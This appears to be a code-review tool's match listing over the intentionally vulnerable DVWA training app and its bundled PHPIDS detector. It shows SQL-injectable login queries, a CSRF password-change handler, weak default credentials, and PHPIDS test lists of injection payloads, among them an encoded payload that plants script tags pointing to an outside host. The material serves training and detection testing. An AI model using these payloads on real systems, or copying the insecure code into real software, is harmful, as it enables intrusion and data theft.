51:    <input type=\"password\" AUTOCOMPLETE=\"off\" name=\"password_new\"><br>
52:    Confirm new password: <br>
53:    <input type=\"password\" AUTOCOMPLETE=\"off\" name=\"password_conf\">
54-    <br>
55-    <input type=\"submit\" value=\"Change\" name=\"Change\">
56-    </form>
./vulnerabilities/csrf/source/low.php:6 (5/42) OK | Dubious | Bad | Hide 
3-	if (isset($_GET['Change'])) {
4-	
5-		// Turn requests into variables
6:		$pass_new = $_GET['password_new'];
7:		$pass_conf = $_GET['password_conf'];
8-
9-
10-		if (($pass_new == $pass_conf)){
11-			$pass_new = mysql_real_escape_string($pass_new);
12-			$pass_new = md5($pass_new);
13-
14:			$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
15-			$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
16-						
17-			$html .= "<pre> Password Changed </pre>";
./vulnerabilities/csrf/source/high.php:6 (6/42) OK | Dubious | Bad | Hide 
3-	if (isset($_GET['Change'])) {
4-	
5-		// Turn requests into variables
6:		$pass_curr = $_GET['password_current'];
7:		$pass_new = $_GET['password_new'];
8:		$pass_conf = $_GET['password_conf'];
9-
10:		// Sanitise current password input
11-		$pass_curr = stripslashes( $pass_curr );
12-		$pass_curr = mysql_real_escape_string( $pass_curr );
13-		$pass_curr = md5( $pass_curr );
14-		
15:		// Check that the current password is correct
16:		$qry = "SELECT password FROM `users` WHERE user='admin' AND password='$pass_curr';";
17-		$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
18-
19-		if (($pass_new == $pass_conf) && ( $result && mysql_num_rows( $result ) == 1 )){
20-			$pass_new = mysql_real_escape_string($pass_new);
21-			$pass_new = md5($pass_new);
22-
23:			$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
24-			$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
25-						
26-			$html .= "<pre> Password Changed </pre>";
./vulnerabilities/csrf/source/high.php:31 (7/42) OK | Dubious | Bad | Hide 
28-		}
29-	
30-		else{		
31:			$html .= "<pre> Passwords did not match or current password incorrect. </pre>";			
32-		}
33-
34-	}
./vulnerabilities/csrf/source/medium.php:9 (8/42) OK | Dubious | Bad | Hide 
6-		if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){
7-	
8-			// Turn requests into variables
9:			$pass_new = $_GET['password_new'];
10:			$pass_conf = $_GET['password_conf'];
11-
12-			if ($pass_new == $pass_conf){
13-				$pass_new = mysql_real_escape_string($pass_new);
14-				$pass_new = md5($pass_new);
15-
16:				$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
17-				$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
18-						
19-				$html .= "<pre> Password Changed </pre>";
./vulnerabilities/sqli_blind/help/help.php:16 (9/42) OK | Dubious | Bad | Hide 
13-		
14-		<p>The 'id' variable within this PHP script is vulnerable to SQL injection.</p>
15-		
16:		<p>There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!</p>
17-		
18-		<p>If you have received a Magicquotes error, turn them off in php.ini.</p>
19-
./vulnerabilities/brute/index.php:45 (10/42) OK | Dubious | Bad | Hide 
42-
43-		<form action=\"#\" method=\"GET\">
44-			Username:<br><input type=\"text\" name=\"username\"><br>
45:			Password:<br><input type=\"password\" AUTOCOMPLETE=\"off\" name=\"password\"><br>
46-			<input type=\"submit\" value=\"Login\" name=\"Login\">
47-		</form>
48-
./vulnerabilities/brute/source/low.php:7 (11/42) OK | Dubious | Bad | Hide 
4-
5-	$user = $_GET['username'];
6-	
7:	$pass = $_GET['password'];
8-	$pass = md5($pass);
9-
10:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
11-	$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
12-
13-	if( $result && mysql_num_rows( $result ) == 1 ) {
./vulnerabilities/brute/source/low.php:19 (12/42) OK | Dubious | Bad | Hide 
16-		$avatar = mysql_result( $result, $i, "avatar" );
17-
18-		// Login Successful
19:		$html .= "<p>Welcome to the password protected area " . $user . "</p>";
20-		$html .= '<img src="' . $avatar . '" />';
21-	} else {
22-		//Login failed
23:		$html .= "<pre><br>Username and/or password incorrect.</pre>";
24-	}
25-
26-	mysql_close();
./vulnerabilities/brute/source/high.php:10 (13/42) OK | Dubious | Bad | Hide 
7-	$user = stripslashes( $user );
8-	$user = mysql_real_escape_string( $user );
9-
10:	// Sanitise password input
11:	$pass = $_GET[ 'password' ];
12-	$pass = stripslashes( $pass );
13-	$pass = mysql_real_escape_string( $pass );
14-	$pass = md5( $pass );
15-
16:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
17-	$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
18-
19-	if( $result && mysql_num_rows( $result ) == 1 ) {
./vulnerabilities/brute/source/high.php:25 (14/42) OK | Dubious | Bad | Hide 
22-		$avatar = mysql_result( $result, $i, "avatar" );
23-
24-		// Login Successful
25:		$html .= "<p>Welcome to the password protected area " . $user . "</p>";
26-		$html .= '<img src="' . $avatar . '" />';
27-	} else {
28-		// Login failed
29-		sleep(3);
30:		$html .= "<pre><br>Username and/or password incorrect.</pre>";
31-		}
32-
33-	mysql_close();
./vulnerabilities/brute/source/medium.php:9 (15/42) OK | Dubious | Bad | Hide 
6-	$user = $_GET[ 'username' ];
7-	$user = mysql_real_escape_string( $user );
8-
9:	// Sanitise password input
10:	$pass = $_GET[ 'password' ];
11-	$pass = mysql_real_escape_string( $pass );
12-	$pass = md5( $pass );
13-
14:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
15-	$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
16-
17-	if( $result && mysql_num_rows($result) == 1 ) {
./vulnerabilities/brute/source/medium.php:23 (16/42) OK | Dubious | Bad | Hide 
20-		$avatar = mysql_result( $result, $i, "avatar" );
21-
22-		// Login Successful
23:		$html .= "<p>Welcome to the password protected area " . $user . "</p>";
24-		$html .= '<img src="' . $avatar . '" />';
25-	} else {
26-		//Login failed
27:		$html .= "<pre><br>Username and/or password incorrect.</pre>";
28-	}
29-
30-	mysql_close();
./vulnerabilities/brute/help/help.php:9 (17/42) OK | Dubious | Bad | Hide 
6-	<tr>
7-	<td><div id="code">
8-	
9:	<p>Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.</p>
10-
11:	<p>Users often choose weak passwords. Examples of insecure choices include single words found in dictionaries, given and family names, any too short password 
12:	(usually thought to be 6 or 7 characters or less), or any password meeting a too restrictive and so predictable, pattern (eg, alternating vowels and consonants).</p>
13-
14:	<p>A last resort is to try every possible password, known as a brute force attack. In theory, if there is no limit to the number of attempts, a brute force attack will always
15:	be successful since the rules for acceptable passwords must be publicly known; but as the length of the password increases, so does the number of possible passwords.</p>
16-
17-	</div></td>
18-	</tr>
./vulnerabilities/sqli/help/help.php:16 (18/42) OK | Dubious | Bad | Hide 
13-		
14-		<p>The 'id' variable within this PHP script is vulnerable to SQL injection.</p>
15-		
16:		<p>There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!</p>
17-		
18-		<p>If you have received a Magicquotes error, turn them off in php.ini.</p>
19-
./external/phpids/0.6/tests/IDS/MonitorTest.php:624 (19/42) OK | Dubious | Bad | Hide 
621-        $exploits[] = 'aaa\' or (1)=(1) #!asd';
622-        $exploits[] = 'aaa\' OR (1) IS NOT NULL #!asd';
623-        $exploits[] = 'a\' or 1=\'1';
624:        $exploits[] = 'asd\' union (select username,password from admins) where id=\'1';
625-        $exploits[] = "1'; WAITFOR TIME '17:48:00 ' shutdown -- -a";
626-        $exploits[] = "1'; anything: goto anything -- -a";
627-        $exploits[] = "' =+ '";
./external/phpids/0.6/tests/IDS/MonitorTest.php:715 (20/42) OK | Dubious | Bad | Hide 
712-        $exploits[] = "' OR UserID > 1";
713-        $exploits[] = "'  OR UserID RLIKE  '.+' ";
714-        $exploits[] = "'OR UserID <> 2";
715:        $exploits[] = "1' union (select password from users) -- -a";
716:        $exploits[] = "1' union (select'1','2',password from users) -- -a";
717:        $exploits[] = "1' union all (select'1',password from users) -- -a";
718-        $exploits[] = "aa'!='1";
719-        $exploits[] = "aa'!=~'1";
720-        $exploits[] = "aa'=('aa')#(";
./external/phpids/0.6/tests/IDS/MonitorTest.php:895 (21/42) OK | Dubious | Bad | Hide 
892-        $exploits = array();
893-
894-        $exploits[] = "asd'; shutdown; ";
895:        $exploits[] = "asd'; select null,password,null from users; ";
896-        $exploits[] = "aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user OPEN tablecursor ";
897-        $exploits[] = "aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b
898-                        where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user
./external/phpids/0.6/tests/IDS/MonitorTest.php:906 (22/42) OK | Dubious | Bad | Hide 
903-                        CLOSE tablecursor DEALLOCATE tablecursor;
904-                        and some text, to get pass the centrifuge; and some more text.";
905-        $exploits[] = "@query  = null+null+null+ ' UPDATE '+null+@a+ ' SET[  '+null+@b+ ' ]  = @payload'";
906:        $exploits[] = "asd' union distinct(select null,password,null from users)--a ";
907:        $exploits[] = "asd' union distinct ( select null,password,(null)from user )-- a ";
908-        $exploits[] = 'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);';
909-        $exploits[] = "asaa';SELECT[asd]FROM[asd]";
910-        $exploits[] = "asd'; select [column] from users ";
911:        $exploits[] = "0x31 union select @@version,username,password from users ";
912-		$exploits[] = "1 order by if(1<2 ,uname,uid) ";
913-		$exploits[] = "1 order by ifnull(null,userid) ";
914-		$exploits[] = "2' between 1 and 3 or 0x61 like 'a";
./external/phpids/0.6/tests/IDS/MonitorTest.php:919 (23/42) OK | Dubious | Bad | Hide 
916-		$exploits[] = "-1' /ID having 1< 1 and 1 like 1/'1 ";
917-		$exploits[] = "2' / 0x62 or 0 like binary '0";
918-		$exploits[] = "0' between 2-1 and 4-1 or 1 sounds like binary '1 ";
919:		$exploits[] = "-1' union ((select (select user),(select password),1/1 from mysql.user)) order by '1 ";
920-		$exploits[] = "-1' or substring(null/null,1/null,1) or '1";
921-		$exploits[] = "1' and 1 = hex(null-1 or 1) or 1 /'null ";		
922-
./external/phpids/0.6/lib/IDS/Caching/Database.php:213 (24/42) OK | Dubious | Bad | Hide 
210-        // validate connection parameters
211-        if (!$this->config['wrapper']
212-            || !$this->config['user']
213:                || !$this->config['password']
214-                    || !$this->config['table']) {
215-
216-            throw new Exception('
./external/phpids/0.6/lib/IDS/Caching/Database.php:226 (25/42) OK | Dubious | Bad | Hide 
223-            $handle = new PDO(
224-                $this->config['wrapper'],
225-                $this->config['user'],
226:                $this->config['password']
227-            );
228-
229-        } catch (PDOException $e) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrTransform/Input.php:21 (26/42) OK | Dubious | Bad | Hide 
18-        if (isset($attr['checked']) && $t !== 'radio' && $t !== 'checkbox') {
19-            unset($attr['checked']);
20-        }
21:        if (isset($attr['maxlength']) && $t !== 'text' && $t !== 'password') {
22-            unset($attr['maxlength']);
23-        }
24:        if (isset($attr['size']) && $t !== 'text' && $t !== 'password') {
25-            $result = $this->pixels->validate($attr['size'], $config, $context);
26-            if ($result === false) unset($attr['size']);
27-            else $attr['size'] = $result;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Forms.php:40 (27/42) OK | Dubious | Bad | Hide 
37-            'size' => 'Number',
38-            'src' => 'URI#embeds',
39-            'tabindex' => 'Number',
40:            'type' => 'Enum#text,password,checkbox,button,radio,submit,reset,file,hidden,image',
41-            'value' => 'CDATA',
42-        ));
43-        $input->attr_transform_post[] = new HTMLPurifier_AttrTransform_Input();
./external/phpids/0.6/lib/IDS/Log/Database.php:93 (28/42) OK | Dubious | Bad | Hide 
90-    private $user = null;
91-
92-    /**
93:     * Database password
94-     *
95-     * @var string
96-     */
97:    private $password = null;
98-
99-    /**
100-     * Database table
./external/phpids/0.6/lib/IDS/Log/Database.php:152 (29/42) OK | Dubious | Bad | Hide 
149-        if ($config instanceof IDS_Init) {
150-            $this->wrapper  = $config->config['Logging']['wrapper'];
151-            $this->user     = $config->config['Logging']['user'];
152:            $this->password = $config->config['Logging']['password'];
153-            $this->table    = $config->config['Logging']['table'];
154-
155-        } elseif (is_array($config)) {
156-            $this->wrapper  = $config['wrapper'];
157-            $this->user     = $config['user'];
158:            $this->password = $config['password'];
159-            $this->table    = $config['table'];
160-        }
161-
./external/phpids/0.6/lib/IDS/Log/Database.php:173 (30/42) OK | Dubious | Bad | Hide 
170-            $this->handle = new PDO(
171-                $this->wrapper,
172-                $this->user,
173:                $this->password
174-            );
175-
176-            $this->statement = $this->handle->prepare('
./dvwa/includes/dvwaPage.inc.php:538 (31/42) OK | Dubious | Bad | Hide 
535-
536-	if ($DBMS == 'MySQL') {
537-
538:		if( !@mysql_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ] )
539-		|| !@mysql_select_db( $_DVWA[ 'db_database' ] ) ) {
540-			die( $DBMS_connError );
541-		}
./dvwa/includes/dvwaPage.inc.php:547 (32/42) OK | Dubious | Bad | Hide 
544-	
545-	elseif ($DBMS == 'PGSQL') {
546-
547:		$dbconn = pg_connect("host=".$_DVWA[ 'db_server' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ])
548-		or die( $DBMS_connError );
549-
550-	}
./dvwa/includes/DBMS/PGSQL.php:10 (33/42) OK | Dubious | Bad | Hide 
7-*/
8-
9-// Connect to server
10:if ( !@pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]) ) {
11-	dvwaMessagePush( "Could not connect to the database - please check the config file." );
12-	dvwaPageReload();
13-}
./dvwa/includes/DBMS/PGSQL.php:34 (34/42) OK | Dubious | Bad | Hide 
31-
32-
33-// Connect to server AND connect to the database
34:$dbconn = @pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]);
35-	
36-	
37-// Create table 'users'
./dvwa/includes/DBMS/PGSQL.php:46 (35/42) OK | Dubious | Bad | Hide 
43-	dvwaPageReload();
44-}
45-
46:$create_tb = "CREATE TABLE users (user_id integer UNIQUE, first_name text, last_name text, username text, password text, avatar text, PRIMARY KEY (user_id));";
47-
48-if( !pg_query( $create_tb ) ){
49-	dvwaMessagePush( "Table could not be created<br />SQL: " . pg_last_error() );
./dvwa/includes/DBMS/PGSQL.php:61 (36/42) OK | Dubious | Bad | Hide 
58-$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';
59-
60-$insert = "INSERT INTO users VALUES
61:	('1','admin','admin','admin',MD5('password'),'{$baseUrl}admin.jpg'),
62-	('2','Gordon','Brown','gordonb',MD5('abc123'),'{$baseUrl}gordonb.jpg'),
63-	('3','Hack','Me','1337',MD5('charley'),'{$baseUrl}1337.jpg'),
64-	('4','Pablo','Picasso','pablo',MD5('letmein'),'{$baseUrl}pablo.jpg'),
65:	('5','bob','smith','smithy',MD5('password'),'{$baseUrl}smithy.jpg');";
66-if( !pg_query( $insert ) ){
67-	dvwaMessagePush( "Data could not be inserted into 'users' table<br />SQL: " . pg_last_error() );
68-	dvwaPageReload();
./dvwa/includes/DBMS/DBMS.php:21 (37/42) OK | Dubious | Bad | Hide 
18- }
19- 
20- function db_login( $user,$pass )  {
21:  $login = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
22-
23-	$result = @mysql_query($login) or die('<pre>' . mysql_error() . '</pre>' );
24-
./dvwa/includes/DBMS/DBMS.php:45 (38/42) OK | Dubious | Bad | Hide 
42- }
43- 
44- function db_login( $user,$pass ) {
45:    $login = "SELECT * FROM users WHERE username='$user' AND password='$pass';";
46-  
47-  $result = @pg_query( $login ) or die('<pre>' . pg_last_error() . '</pre>');
48-
./dvwa/includes/DBMS/DBMS.php:77 (39/42) OK | Dubious | Bad | Hide 
74-	global $DBMS_connError;
75-
76-	if ($DBMS == 'MySQL') {
77:		if( !@mysql_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ] )
78-		|| !@mysql_select_db( $_DVWA[ 'db_database' ] ) ) {
79-			die( $DBMS_connError );
80-		}
81-	}
82-	
83-	elseif ($DBMS == 'PGSQL') {
84:		$dbconn = @pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]) 
85-		or die( $DBMS_connError );
86-	}
87-}
./dvwa/includes/DBMS/MySQL.php:9 (40/42) OK | Dubious | Bad | Hide 
6-
7-*/
8-
9:if( !@mysql_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ] ) ) {
10-	dvwaMessagePush( "Could not connect to the database - please check the config file." );
11-	dvwaPageReload();
12-}
./dvwa/includes/DBMS/MySQL.php:36 (41/42) OK | Dubious | Bad | Hide 
33-	dvwaPageReload();
34-}
35-
36:$create_tb = "CREATE TABLE users (user_id int(6),first_name varchar(15),last_name varchar(15), user varchar(15), password varchar(32),avatar varchar(70), PRIMARY KEY (user_id));";
37-if( !mysql_query( $create_tb ) ){
38-	dvwaMessagePush( "Table could not be created<br />SQL: ".mysql_error() );
39-	dvwaPageReload();
./dvwa/includes/DBMS/MySQL.php:52 (42/42) OK | Dubious | Bad | Hide 
49-$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';
50-
51-$insert = "INSERT INTO users VALUES
52:	('1','admin','admin','admin',MD5('password'),'{$baseUrl}admin.jpg'),
53-	('2','Gordon','Brown','gordonb',MD5('abc123'),'{$baseUrl}gordonb.jpg'),
54-	('3','Hack','Me','1337',MD5('charley'),'{$baseUrl}1337.jpg'),
55-	('4','Pablo','Picasso','pablo',MD5('letmein'),'{$baseUrl}pablo.jpg'),
56:	('5','Bob','Smith','smithy',MD5('password'),'{$baseUrl}smithy.jpg');";
57-if( !mysql_query( $insert ) ){
58-	dvwaMessagePush( "Data could not be inserted into 'users' table<br />SQL: ".mysql_error() );
59-	dvwaPageReload();

host (29) Top | Hide

./index.php:25 (1/29) OK | Dubious | Bad | Hide 
23-		<h2> WARNING! </h2>
24-
25:		<p>Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting provider's public html folder or any internet facing web server as it will be compromised. We recommend downloading and installing ".dvwaExternalLinkUrlGet( 'http://www.apachefriends.org/en/xampp.html','XAMPP' )." onto a local machine inside your LAN which is used solely for testing.</p>
26-
27-	<h2>Disclaimer</h2>
28-
./config/config.inc.php:4 (2/29) OK | Dubious | Bad | Hide 
1-<?php
2-
3-# If you are having problems connecting to the MySQL database and all of the variables below are correct
4:# try changing the 'db_server' variable from localhost to 127.0.0.1. Fixes a problem due to sockets.
5-# Thanks to digininja for the fix.
6-
7-# Database management system to use
./config/config.inc.php:15 (3/29) OK | Dubious | Bad | Hide 
12-# Database variables
13-
14-$_DVWA = array();
15:$_DVWA[ 'db_server' ] = 'localhost';
16-$_DVWA[ 'db_database' ] = 'dvwa';
17-$_DVWA[ 'db_user' ] = 'root';
18-$_DVWA[ 'db_password' ] = '';
./external/phpids/0.6/tests/IDS/MonitorTest.php:1325 (4/29) OK | Dubious | Bad | Hide 
1322-        $exploits[] = "select *something* from the menu";
1323-        $exploits[] = '<![CDATA[:??]]>';
1324-        $exploits[] = 'website_link => /app/search?op=search;keywords=peter%20testcase;';
1325:        $exploits[] = '<xjxobj><e><k>insert</k><v>insert</v></e><e><k>errorh</k><v>error</v></e><e><k>hostname</k><v>ab</v></e><e><k>ip</k><v>10.2.2.22</v></e><e><k>asset</k><v>2</v></e><e><k>thresholdc</k><v>30</v></e><e><k>thresholda</k><v>30</v></e><e><k>rrd_profile</k><v></v></e><e><k>nat</k><v></v></e><e><k>nsens</k><v>1</v></e><e><k>os</k><v>Unknown</v></e><e><k>mac</k><v></v></e><e><k>macvendor</k><v></v></e><e><k>descr</k><v><![CDATA[&]]></v></e></xjxobj>';
1326-        $exploits[] = '"hi" said the mouse to the cat and \'showed off\' her options';
1327-        $exploits[] = 'eZtwEI9v7nI1mV4Baw502qOhmGZ6WJ0ULN1ufGmwN5j+k3L6MaI0Hv4+RlOo42rC0KfrwUUm5zXOfy9Gka63m02fdsSp52nhK0Jsniw2UgeedUvn0SXfNQc/z13/6mVkcv7uVN63o5J8xzK4inQ1raknqYEwBHvBI8WGyJ0WKBMZQ26Nakm963jRb18Rzv6hz1nlf9cAOH49EMiD4vzd1g==';
1328-        $exploits[] = '"European Business School (ebs)"';
./external/phpids/0.6/lib/IDS/Caching/Memcached.php:202 (5/29) OK | Dubious | Bad | Hide 
199-    private function _connect() 
200-    {
201-
202:        if ($this->config['host'] && $this->config['port']) {
203-            // establish the memcache connection
204-            $this->memcache = new Memcache;
205:            $this->memcache->pconnect($this->config['host'], 
206-                $this->config['port']);
207-            $this->path = $this->config['tmp_path'];
208-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIParser.php:58 (6/29) OK | Dubious | Bad | Hide 
55-            $matches = array();
56-            preg_match($r_authority, $authority, $matches);
57-            $userinfo   = !empty($matches[1]) ? $matches[2] : null;
58:            $host       = !empty($matches[3]) ? $matches[3] : '';
59-            $port       = !empty($matches[4]) ? (int) $matches[5] : null;
60-        } else {
61:            $port = $host = $userinfo = null;
62-        }
63-        
64-        return new HTMLPurifier_URI(
65:            $scheme, $userinfo, $host, $port, $path, $query, $fragment);
66-    }
67-    
68-}
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIDefinition.php:17 (7/29) OK | Dubious | Bad | Hide 
14-    public $base;
15-    
16-    /**
17:     * String host to consider "home" base, derived off of $base
18-     */
19:    public $host;
20-    
21-    /**
22-     * Name of default scheme based on %URI.DefaultScheme and %URI.Base
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIDefinition.php:64 (8/29) OK | Dubious | Bad | Hide 
61-    }
62-    
63-    protected function setupMemberVariables($config) {
64:        $this->host = $config->get('URI', 'Host');
65-        $base_uri = $config->get('URI', 'Base');
66-        if (!is_null($base_uri)) {
67-            $parser = new HTMLPurifier_URIParser();
68-            $this->base = $parser->parse($base_uri);
69-            $this->defaultScheme = $this->base->scheme;
70:            if (is_null($this->host)) $this->host = $this->base->host;
71-        }
72-        if (is_null($this->defaultScheme)) $this->defaultScheme = $config->get('URI', 'DefaultScheme');
73-    }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/URI/Host.php:4 (9/29) OK | Dubious | Bad | Hide 
1-<?php
2-
3-/**
4: * Validates a host according to the IPv4, IPv6 and DNS (future) specifications.
5- */
6-class HTMLPurifier_AttrDef_URI_Host extends HTMLPurifier_AttrDef
7-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/URI/Host.php:53 (10/29) OK | Dubious | Bad | Hide 
50-        $domainlabel   = "$an($and*$an)?";
51-        // toplabel    = alpha | alpha *( alphanum | "-" ) alphanum
52-        $toplabel      = "$a($and*$an)?";
53:        // hostname    = *( domainlabel "." ) toplabel [ "." ]
54-        $match = preg_match("/^($domainlabel\.)*$toplabel\.?$/i", $string);
55-        if (!$match) return false;
56-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:14 (11/29) OK | Dubious | Bad | Hide 
11-class HTMLPurifier_URI
12-{
13-    
14:    public $scheme, $userinfo, $host, $port, $path, $query, $fragment;
15-    
16-    /**
17-     * @note Automatically normalizes scheme and port
18-     */
19:    public function __construct($scheme, $userinfo, $host, $port, $path, $query, $fragment) {
20-        $this->scheme = is_null($scheme) || ctype_lower($scheme) ? $scheme : strtolower($scheme);
21-        $this->userinfo = $userinfo;
22:        $this->host = $host;
23-        $this->port = is_null($port) ? $port : (int) $port;
24-        $this->path = $path;
25-        $this->query = $query;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:71 (12/29) OK | Dubious | Bad | Hide 
68-        $chars_pchar = $chars_sub_delims . ':@';
69-        
70-        // validate scheme (MUST BE FIRST!)
71:        if (!is_null($this->scheme) && is_null($this->host)) {
72-            $def = $config->getDefinition('URI');
73-            if ($def->defaultScheme === $this->scheme) {
74-                $this->scheme = null;
75-            }
76-        }
77-        
78:        // validate host
79:        if (!is_null($this->host)) {
80:            $host_def = new HTMLPurifier_AttrDef_URI_Host();
81:            $this->host = $host_def->validate($this->host, $config, $context);
82:            if ($this->host === false) $this->host = null;
83-        }
84-        
85-        // validate username
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:99 (13/29) OK | Dubious | Bad | Hide 
96-        // validate path
97-        $path_parts = array();
98-        $segments_encoder = new HTMLPurifier_PercentEncoder($chars_pchar . '/');
99:        if (!is_null($this->host)) {
100-            // path-abempty (hier and relative)
101-            $this->path = $segments_encoder->encode($this->path);
102-        } elseif ($this->path !== '' && $this->path[0] === '/') {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:153 (14/29) OK | Dubious | Bad | Hide 
150-    public function toString() {
151-        // reconstruct authority
152-        $authority = null;
153:        if (!is_null($this->host)) {
154-            $authority = '';
155-            if(!is_null($this->userinfo)) $authority .= $this->userinfo . '@';
156:            $authority .= $this->host;
157-            if(!is_null($this->port))     $authority .= ':' . $this->port;
158-        }
159-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/HostBlacklist.php:12 (15/29) OK | Dubious | Bad | Hide 
9-        return true;
10-    }
11-    public function filter(&$uri, $config, $context) {
12:        foreach($this->blacklist as $blacklisted_host_fragment) {
13:            if (strpos($uri->host, $blacklisted_host_fragment) !== false) {
14-                return false;
15-            }
16-        }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/MakeAbsolute.php:28 (16/29) OK | Dubious | Bad | Hide 
25-        if (is_null($this->base)) return true; // abort early
26-        if (
27-            $uri->path === '' && is_null($uri->scheme) &&
28:            is_null($uri->host) && is_null($uri->query) && is_null($uri->fragment)
29-        ) {
30-            // reference to current document
31-            $uri = clone $this->base;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/MakeAbsolute.php:36 (17/29) OK | Dubious | Bad | Hide 
33-        }
34-        if (!is_null($uri->scheme)) {
35-            // absolute URI already: don't change
36:            if (!is_null($uri->host)) return true;
37-            $scheme_obj = $uri->getSchemeObj($config, $context);
38-            if (!$scheme_obj) {
39-                // scheme not recognized
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/MakeAbsolute.php:48 (18/29) OK | Dubious | Bad | Hide 
45-            }
46-            // special case: had a scheme but always is hierarchical and had no authority
47-        }
48:        if (!is_null($uri->host)) {
49-            // network path, don't bother
50-            return true;
51-        }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/MakeAbsolute.php:58 (19/29) OK | Dubious | Bad | Hide 
55-            // relative path, needs more complicated processing
56-            $stack = explode('/', $uri->path);
57-            $new_stack = array_merge($this->basePathStack, $stack);
58:            if ($new_stack[0] !== '' && !is_null($this->base->host)) {
59-                array_unshift($new_stack, '');
60-            }
61-            $new_stack = $this->_collapseStack($new_stack);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter/MakeAbsolute.php:70 (20/29) OK | Dubious | Bad | Hide 
67-        // re-combine
68-        $uri->scheme = $this->base->scheme;
69-        if (is_null($uri->userinfo)) $uri->userinfo = $this->base->userinfo;
70:        if (is_null($uri->host))     $uri->host     = $this->base->host;
71-        if (is_null($uri->port))     $uri->port     = $this->base->port;
72-        return true;
73-    }
